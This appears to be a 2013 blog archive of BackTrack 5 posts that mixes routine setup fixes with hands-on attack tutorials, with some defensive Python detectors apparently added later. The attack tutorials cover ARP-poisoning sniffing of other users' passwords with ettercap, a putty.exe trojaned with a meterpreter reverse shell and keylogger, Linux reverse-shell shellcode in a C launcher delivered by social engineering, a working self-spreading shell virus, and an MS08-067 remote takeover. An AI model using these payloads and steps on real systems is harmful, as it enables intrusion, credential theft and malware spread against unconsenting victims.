Thursday, January 24, 2013

Solution msfconsole & msfupdate are not running after updating to 4.5.0 metasploit bt0

For BackTrack 5 R3 users who find that msfconsole and msfupdate no longer run properly after doing apt-get update and apt-get upgrade, the following explains the cause and a solution.

One cause of the problem is that the directory "msf3" does not exist under /opt/metasploit. Some people work around this by copying the msf3 directory from a BackTrack install that has not been updated/upgraded into the one that has. In my opinion, that only leaves us with the same Metasploit version as the non-updated BackTrack. The solution I currently use, which also stays up to date, is the "git clone" command.

Here are the steps:

  1. cd /opt/metasploit
  2. git clone https://github.com/rapid7/metasploit-framework.git msf3



Once the clone has completed, restart msfconsole:

Hopefully useful.

Wednesday, January 23, 2013

How To Upgrade to BackTrack 5 R3

The size of BackTrack 5 R3 has grown compared to the previous version, which makes some BackTrack users dread downloading the BackTrack 5 R3 ISO. But it pays off with the number of changes in this latest version, from the addition of new applications to fixes for bugs in the previous version; the developers have clearly done serious work on this distribution.

And for friends whose fate it is to live with a connection as fast as a snail (only about 20 kbps), the following problems (from personal experience) come up when downloading BackTrack 5 R3, among others:

1. Food rations cut from 3 meals a day to 1 (the internet quota is expensive).
2. Sick from lack of sleep (4 days and 3 nights without sleep waiting for the download).
3. Can't SMS or call the girlfriend (the purchased quota is all used up).
4. Lots of daydreaming (when the download finally finishes...).
5. Constant anxiety (is the file corrupt or not?).
6. And much more.


Therefore I will provide solutions to these problems; there are two options:

1. Buy the BackTrack 5 R3 DVD at a cheap price here.
2. Upgrade; this also needs quota, but not as much as a full download, and a friend avoids the problems above.

Tutorial Upgrade to BackTrack 5 R3

Step by step:
Pay attention to and follow each step below.

1. Make sure the system we are using is up to date; to refresh the package lists use the command:

root@bt:~# apt-get update

2. Once the package lists are up to date, upgrade with the command:

root@bt:~# apt-get dist-upgrade

3. After the upgrade completes, the next stage is to install the newest applications in BackTrack 5 R3. The 32-bit and 64-bit tool sets differ slightly, so make sure to use the list for your version of BackTrack.

BackTrack 32 bit

root@bt:~# apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

BackTrack 64 bit

root@bt:~# apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

4. Wait until all applications are installed properly, then restart when finished. I hope this tutorial is useful for friends.

How To Sniff with ettercap

Ettercap is a good program for sniffing, because it captures data on the local network. Ettercap can capture all network traffic, so we can capture passwords entered by other users on our network, analyze captured conversations from messaging clients such as MSN or other instant messaging clients, use man-in-the-middle (MITM) techniques, and so on.

The first step is to install the sniffer (ettercap).
The latest version is 0.7.3 and it is available for Linux and Windows.

Windows version
Linux version

For distro based on debian / ubuntu simply type :

# sudo apt-get install ettercap-gtk

For other distributions, we need to download the source and compile the package:


# ./configure
# make
# make install


How to?

First open Ettercap and run it as root.

Sniffer > Unified Sniffing

Select the network card you want to use and click "OK".

Hosts > Scan for Hosts
At the bottom of the screen a message reports how many hosts were added to the Hosts List (these are the computers that are online in the network).

Hosts > Host list

Now the IPs of the connected computers appear; remember that the router appears here as well.

Select the IP of the computer to attack and click "Add to Target 1", then select the router and click "Add to Target 2".

Before starting to sniff, recall that we use a technique called man-in-the-middle.

MITM > ARP Poisoning - now tick "Sniff remote connections" and click "OK".

Start > Start sniffing.


We are now sniffing.

View > Connections - Here we can see all the connections; double click one to see the data it contains, including conversations, usernames and passwords, etc.

Now leave it and let Ettercap work. ;)
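The ARP Poisoning step above works by sending forged ARP replies so that the victim maps the gateway's IP to the attacker's MAC. As an added example (not part of the original post), here is a small Python detector that a defender can run over ARP reply records: it keeps the first MAC seen for each IP (or a trusted static table, for instance the gateway) and raises an alert when an IP's MAC changes or when one MAC answers for several IPs. The log lines, their format, and the function names are constructed for this demonstration.

```python
"""Detect signs of ARP poisoning in a list of ARP reply records.

Added example (not the original post's code). Records are constructed in the
simplified form "timestamp ip is-at mac". The gateway 192.168.1.1 is first
announced by aa:bb:cc:00:00:01 and later by the MAC that owns 192.168.1.50,
which is what a poisoning run looks like on the wire.
"""
from collections import defaultdict

# Constructed sample input for the demonstration.
SAMPLE_ARP_LOG = """\
10:00:01 192.168.1.1 is-at aa:bb:cc:00:00:01
10:00:02 192.168.1.50 is-at de:ad:be:ef:00:50
10:00:03 192.168.1.20 is-at aa:bb:cc:00:00:20
10:00:10 192.168.1.1 is-at de:ad:be:ef:00:50
10:00:11 192.168.1.20 is-at de:ad:be:ef:00:50
"""


def parse_arp_log(text):
    """Yield (timestamp, ip, mac) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "is-at":
            continue
        yield parts[0], parts[1], parts[3].lower()


def detect_arp_poisoning(text, trusted=None):
    """Return a list of alert strings for the records in `text`.

    trusted: optional {ip: mac} table of static bindings (e.g. the gateway);
    a reply contradicting it is reported even if it is the first one seen.
    """
    alerts = []
    believed = dict(trusted or {})      # ip -> mac we currently believe
    ips_per_mac = defaultdict(set)      # mac -> set of IPs it has claimed
    for ts, ip, mac in parse_arp_log(text):
        ips_per_mac[mac].add(ip)
        known = believed.get(ip)
        if known is None:
            believed[ip] = mac          # first sighting, remember it
        elif known != mac:
            alerts.append(f"{ts} MAC change for {ip}: {known} -> {mac}")
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:                # one NIC answering for many hosts
            alerts.append(f"MAC {mac} claims {len(ips)} IPs: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_LOG):
        print(alert)
```

In practice the records would come from a capture tool or a periodic dump of the ARP cache on a monitored host; a static `trusted` table for the gateway is the cheapest way to catch the exact swap this tutorial performs.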

how to exploit windows 7 and windows XP using backtrack 5

Please read this article about how to exploit Windows 7 and how to exploit Windows XP. Here

Exploiting Windows XP and Windows 7: creating a backdoor with x86/shikata_ga_nai

If you think Windows 7 cannot be exploited, you are wrong, because there are many ways to exploit an operating system. Now we will exploit Windows XP and 7, and in addition record keyboard keystrokes (keylogger) through meterpreter. Check it out.

1. Find a file you will use to lure the target into executing it. Here I use putty.exe, so download it first.

root@bt:~# wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

2. Infect the file so that executing it runs the payload. Rename putty.exe to putty_pro.exe and encode it with x86/shikata_ga_nai; experienced users already know this.

root@bt:/# cd /pentest/exploits/framework
root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.125 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5

3. Run Metasploit and create a listener, so that when the executable we created above runs, a meterpreter session opens automatically.

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost IP_KITA
exploit

4. I will not say how to copy the infected file onto the victim's computer; somehow [it takes some effort, bro]. When the executable runs, a meterpreter session opens automatically; what you do with the computer is then up to you.

Note: the connection from our computer to the target is lost when the executed file is closed [tested, so we know].


5. Bonus: recording everything typed on the keyboard. Use the command keyscan_start, and to see the victim's keystrokes use keyscan_dump. Pwned!

Windows XP :

Windows 7 :



Hopefully this tutorial helps friends who are having trouble finding tutorials.

how to fix the sound problem in backtrack 5

If you use BackTrack 5 R1 or another version, you may have discovered that sound does not work properly; let's fix it here.

1. Go to System > Preferences > Startup Applications

2. Then click Add and enter the following configuration:

Name : Pulseaudio daemon
Command : /usr/bin/pulseaudio
Comment : Start the sound daemon

Logout and login again, please enjoy the music.

How To Exploit Linux using Backtrack 5


This time we will exploit the Linux operating system. My friend may feel that Linux is the most secure operating system in the world, but I say no, because no system in the world is the safest; if the system really cannot be penetrated, just use social engineering, or kidnap the administrator and ask him, hehe.. Here is an example of the exploitation.
1. Get exploit code.
root@bt:~# cd /pentest/exploits/framework/
root@bt:/pentest/exploits/framework# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.43.66 LPORT=5050 C
/*
 * linux/x86/shell_reverse_tcp - 71 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.43.66, LPORT=5050,
 * ReverseConnectRetries=5, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependChrootBreak=false, AppendExit=false,
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
root@bt:/pentest/exploits/framework#
2. Create the exploit file.
Open gedit, paste the shellcode we obtained above, and edit it to look like this:

/* shellcode from the msfpayload output above */
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
    int (*funct)();               /* function pointer aimed at the buffer */
    funct = (int (*)()) buf;
    (*funct)();                   /* jump into the shellcode */
    return 0;
}
Save it as exploitbacktrack.c
3. Compile file exploit.
root@bt:~# gcc -o exploitbacktrack exploitbacktrack.c
root@bt:~#
4. Use social engineering to get the exploit file onto the target computer.
5. Open a new terminal and create a listener to wait for our exploit file to be executed.
root@bt:~# nc -lvp 5050
6. And tadaaa!!
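Added example, not part of the original post: the msfpayload listing in step 1 embeds LHOST and LPORT directly in the machine code, as a push imm32 (0x68 + 4 bytes, the IP in network byte order) immediately followed by a push imm16 (0x66 0x68 + 2 bytes, the port in network byte order) that builds the sockaddr_in for connect(). An analyst who finds a blob like this in a suspicious binary can therefore read off the connect-back address without executing it. The Python below parses the buf[] string from the listing and extracts that pair; the byte-pattern assumption is mine and holds for this payload family, not for shellcode in general.

```python
"""Recover the connect-back IP and port from linux/x86 shell_reverse_tcp
shellcode without running it.

Added example (not the original post's code). Assumption: the address is
built by "push imm32 ; push imm16" (bytes 68 xx xx xx xx 66 68 yy yy),
which is how this Metasploit payload lays out the sockaddr_in.
"""
import re
import socket
import struct

# The buf[] string exactly as the msfpayload listing above spells it.
SHELLCODE_C = (
    r"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    r"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
    r"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
    r"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    r"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# push imm32 ; push imm16 -> the (ip, port) pair of the sockaddr_in
ADDR_PATTERN = re.compile(rb"\x68(.{4})\x66\x68(.{2})", re.DOTALL)


def c_hex_string_to_bytes(s):
    """Turn a C string made of \\xNN escapes into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", s))


def extract_reverse_tcp_targets(code):
    """Return [(ip, port), ...] for every push-imm32/push-imm16 pair in code."""
    targets = []
    for m in ADDR_PATTERN.finditer(code):
        ip = socket.inet_ntoa(m.group(1))           # already network order
        port = struct.unpack("!H", m.group(2))[0]   # big-endian 16-bit port
        targets.append((ip, port))
    return targets


def summarize(c_source):
    """Length of the decoded blob plus the connect-back targets found in it."""
    code = c_hex_string_to_bytes(c_source)
    return {"length": len(code), "targets": extract_reverse_tcp_targets(code)}


if __name__ == "__main__":
    print(summarize(SHELLCODE_C))   # length 71, target 192.168.43.66:5050
```

The decoded length (71) and the recovered address match the LHOST and LPORT the listing was generated with, which is the cross-check an analyst would make before trusting the extraction on an unknown sample.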

Basic Commands in Back | Track 5


On the basic commands or syntax for operating BackTrack Linux;
no more chit-chat, straight to the scene.

[*] Login
Username root, password toor is the default user for BackTrack; I suggest changing the password right after login with the command
root@bt:~# passwd
then enter the new password

[*] Fixing the splash screen:
root@bt:~# fix-splash

[*] Starting the X server (desktop GUI)
root@bt:~# startx

[*] Networking
To start networking we usually use wicd, but first type in the console:
root@bt:~# /etc/init.d/wicd start
then click:
menu > internet > wicd network manager

Setting a dynamic IP:
root@bt:~# dhclient <your network interface>
-- the interface here could be eth0 or eth1

Setting IP static
for example:
interface - eth0
IP Address - 192.168.1.9/24
Default Gateway - 192.168.1.1
DNS server - 192.168.1.1
the commands used are:

root@bt:~# ifconfig eth0 192.168.1.9/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

These settings are lost on reboot; to make them permanent we need to edit the file /etc/network/interfaces:

root@bt:~# nano /etc/network/interfaces

auto eth0
iface eth0 inet static
address 192.168.1.9
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

then save using CTRL + X, answer y, then press Enter

root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart

[*] Starting services in BT:

    SSH (Secure Shell)
    Before running the ssh service for the first time, we need to generate its keys; run the command:
    root@bt:~# sshd-generate
    root@bt:~# /etc/init.d/ssh start
    Starting OpenBSD Secure Shell server: sshd.

    To stop the service:
    root@bt:~# /etc/init.d/ssh stop
    Stopping OpenBSD Secure Shell server: sshd.

    Apache web server
    root@bt:~# /etc/init.d/apache2 start
    or with the command:
    root@bt:~# service apache2 start
    * Starting web server apache2

    or:
    root@bt:~# apache2ctl start

    To stop the service:
    root@bt:~# /etc/init.d/apache2 stop
    or:
    root@bt:~# service apache2 stop
    or:
    root@bt:~# apache2ctl stop

    MySQL
    To start, use the command:
    root@bt:~# /etc/init.d/mysql start
    or:
    root@bt:~# start mysql

    To stop:
    root@bt:~# /etc/init.d/mysql stop
    or:
    root@bt:~# stop mysql


The commands/syntax above are only a small part of the overall syntax for operating BackTrack Linux; if anyone would like to add to or correct the syntax above, I gladly accept it.

About UNIX SHELL Virus in backtrack


UNIX SHELL Virus
This program has little practical significance, but it helps to understand visually the mechanism by which a virus spreads. Its instructive significance is therefore more important than its practical one.

The program follows:


Code:
#!/bin/sh
#file name: h3ll0s_demo.sh
#purpose: shell virus demonstration
# note: the virus will affect all the files ending with *.sh in the current
# directory, but it will not affect them repeatedly.
#compiler: watercloud@xfocus.org

#date: 13-12-2011
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '<+!a%C&t:>' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Demo shell virus script !"
#E:<+!a%C&t:>
#EOF

Save it as Unixvirus.sh

Explanation:

#B:<+!a%C&t:>
Marks the start of the virus body, so the program can find itself when copying.

vFile=$_ ; vTmp=/tmp/.vTmp.$$
Defines two variables. One is a temporary file; the other is the name of this file, taken from $_. This line must therefore be the first effective line of the program; otherwise it cannot get the name of the current program, and then it cannot find the virus body to copy.

for f in ./*.sh; do
Begins the loop over all programs in the current directory whose names end in .sh.

if [ ! -w $f -a ! -r $vFile ]; then continue; fi
Checks that the target is writable and that the virus source file is readable.

if grep '<+!a%C&t:>' $f ; then continue; fi
Checks whether the target has already been infected. If it has, it would be immoral to infect it again.

if sed -n '1p' $f | grep 'csh'; then continue; fi
Skips a target written for csh, whose syntax is too different.

cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
Prepares for the infection by first copying the target to a backup. What if the copy fails? Then there is no choice but to give up.

vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
Uses a regular expression to determine how many comment lines and blank lines there are at the beginning of the program, and therefore the position at which to inject the virus body.

sed -n "1,${vNo}p" $vTmp >$f
The first sed copies the leading comments of the target file back from the backup.

(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
One more sed transports the virus body into the target.

vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
The last sed appends the remaining part of the target file. sed is strong!

rm -f $vTmp
Cleans up the temporary file.

done >/dev/null 2>&1
Ends the loop.

unset vTmp ;unset vFile ;unset vNo
Cleans up the scene.

echo "Demo shell virus script !"
Since the file has been infected, shows an indication that this is an infected one.

#E:<+!a%C&t:>
Marks the end of the virus body, so the program knows where its own copy stops.
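The explanation above gives a defender everything needed to recognise and undo this infection: the body always sits between the exact lines "#B:<+!a%C&t:>" and "#E:<+!a%C&t:>", it is inserted right after the leading comment/blank lines of the target, and the "echo" in the sed pipeline leaves one empty line after it. The Python below, an added example that is not part of the original post, inspects a script for that pattern and restores the original by removing the block. The sample scripts, the function names, and the abbreviated marker block in the fixture are constructed for this demonstration.

```python
"""Detect and clean scripts infected by the demo shell virus above.

Added example (not the original post's code). Only the marker lines matter
for detection; the fixture below carries a shortened body between them,
not the working virus.
"""
BEGIN_MARK = "#B:<+!a%C&t:>"
END_MARK = "#E:<+!a%C&t:>"

# Constructed sample: a clean helper script and the same script as it looks
# after one infection run (body after the header, then one blank line).
CLEAN_SCRIPT = """\
#!/bin/sh
# backup helper (constructed sample)

tar czf /tmp/backup.tgz /etc
echo done
"""

INFECTED_SCRIPT = """\
#!/bin/sh
# backup helper (constructed sample)

#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
echo "Demo shell virus script !"
#E:<+!a%C&t:>

tar czf /tmp/backup.tgz /etc
echo done
"""


def leading_header_lines(lines):
    """Count comment/blank lines at the top of a script: the same number the
    virus's awk expression computes to choose its insertion point."""
    n = 0
    for line in lines:
        s = line.strip()
        if s == "" or s.startswith("#"):
            n += 1
        else:
            break
    return n


def find_body(lines):
    """Return (start, end) indexes of the first marker pair, or None."""
    stripped = [l.rstrip("\n") for l in lines]
    if BEGIN_MARK not in stripped:
        return None
    start = stripped.index(BEGIN_MARK)
    try:
        end = stripped.index(END_MARK, start + 1)
    except ValueError:          # begin marker without an end marker
        return None
    return start, end


def inspect_script(text):
    """Report whether text carries the marker pair and where it sits."""
    lines = text.splitlines(keepends=True)
    body = find_body(lines)
    if body is None:
        return {"infected": False}
    start, end = body
    return {
        "infected": True,
        "body_lines": end - start + 1,
        # the virus injects right after the header, so everything before the
        # body should be comment/blank lines
        "inserted_after_header": leading_header_lines(lines[:start]) == start,
    }


def disinfect(text):
    """Remove every marker-delimited block (and the blank line the virus
    appends after it). Returns (cleaned_text, blocks_removed)."""
    lines = text.splitlines(keepends=True)
    removed = 0
    while True:
        body = find_body(lines)
        if body is None:
            break
        start, end = body
        cut = end + 1
        if cut < len(lines) and lines[cut].strip() == "":
            cut += 1            # the echo-produced empty line
        del lines[start:cut]
        removed += 1
    return "".join(lines), removed


if __name__ == "__main__":
    print(inspect_script(INFECTED_SCRIPT))
    cleaned, n = disinfect(INFECTED_SCRIPT)
    print(n, cleaned == CLEAN_SCRIPT)
```

Run over every *.sh in a directory, `inspect_script` gives the same answer the virus's own grep check gives, and `disinfect` reverses the three sed steps exactly because the insertion rule is deterministic; a script whose body was edited after infection would still be flagged but might need manual review of what lies between the markers.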

How To Remote Desktop use Exploit in backtrack 5

RDP, better known as Remote Desktop, is commonly used on Windows so that a computer can be accessed remotely over the Internet.
But this time I will show how to get a remote desktop without touching the computer to be controlled, in this case using an exploit in BackTrack 5. Okay, without a lot of talk, straight to the scene.

1. Turn your BackTrack 5
2. Open Terminal
3. Go straight into Metasploit with the command:
     root@bt:~# msfconsole
4. Wait until Metasploit opens.
5. Once it is open, type:
   msf > use exploit/windows/smb/ms08_067_netapi ( enter )

6. The prompt then changes to the module context:
   msf exploit(ms08_067_netapi) >

7. Then type:
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp ( enter )
    msf exploit(ms08_067_netapi) > set RHOST 192.168.0.1 ==> that is the target IP
    msf exploit(ms08_067_netapi) > exploit

8. If successful, the victim's desktop will appear; after that, do whatever you want with it.